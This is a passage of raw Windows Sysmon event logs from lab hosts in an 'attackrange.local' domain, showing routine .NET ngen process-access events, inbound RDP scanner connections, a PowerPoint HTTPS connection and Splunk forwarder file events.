14:58:53.169{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2D-607E-1B0F-00000000BB01}3308C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.169{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2D-607E-1B0F-00000000BB01}3308C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.138{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2D-607E-1A0F-00000000BB01}5632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.122{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC2D-607E-1A0F-00000000BB01}5632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.122{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2D-607E-1A0F-00000000BB01}5632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.075{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2D-607E-190F-00000000BB01}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.060{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2D-607E-190F-00000000BB01}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.060{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2D-607E-190F-00000000BB01}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.028{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2D-607E-180F-00000000BB01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.013{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2D-607E-180F-00000000BB01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.013{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2D-607E-180F-00000000BB01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000050605Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:51.002{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com50837-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050604Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:50.731{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55529-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050603Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:53.362{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B11B182BCC1A5BB9DB51833CB6C67985,SHA256=61D9EC0446EED96DB42C96D6F812694D13E8E3AB52660068E2D2A7776041A60D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050602Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:53.268{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6EC939675990CFC9B60E7B001BFAEF4F,SHA256=80DF444B65477EA83A8A9007BFE2E08A4130136EF11B374D35C736482D8856FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.934{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2E-607E-360F-00000000BB01}6636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.919{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2E-607E-360F-00000000BB01}6636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.919{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2E-607E-360F-00000000BB01}6636C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.888{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2E-607E-350F-00000000BB01}5840C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000081189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:52.756{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57609-false104.76.200.41a104-76-200-41.deploy.static.akamaitechnologies.com443https 10341000x800000000000000081188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.872{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2E-607E-350F-00000000BB01}5840C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.872{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2E-607E-350F-00000000BB01}5840C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.825{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2E-607E-340F-00000000BB01}5984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.809{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2E-607E-340F-00000000BB01}5984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.809{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2E-607E-340F-00000000BB01}5984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.778{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2E-607E-330F-00000000BB01}5084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.763{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2E-607E-330F-00000000BB01}5084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 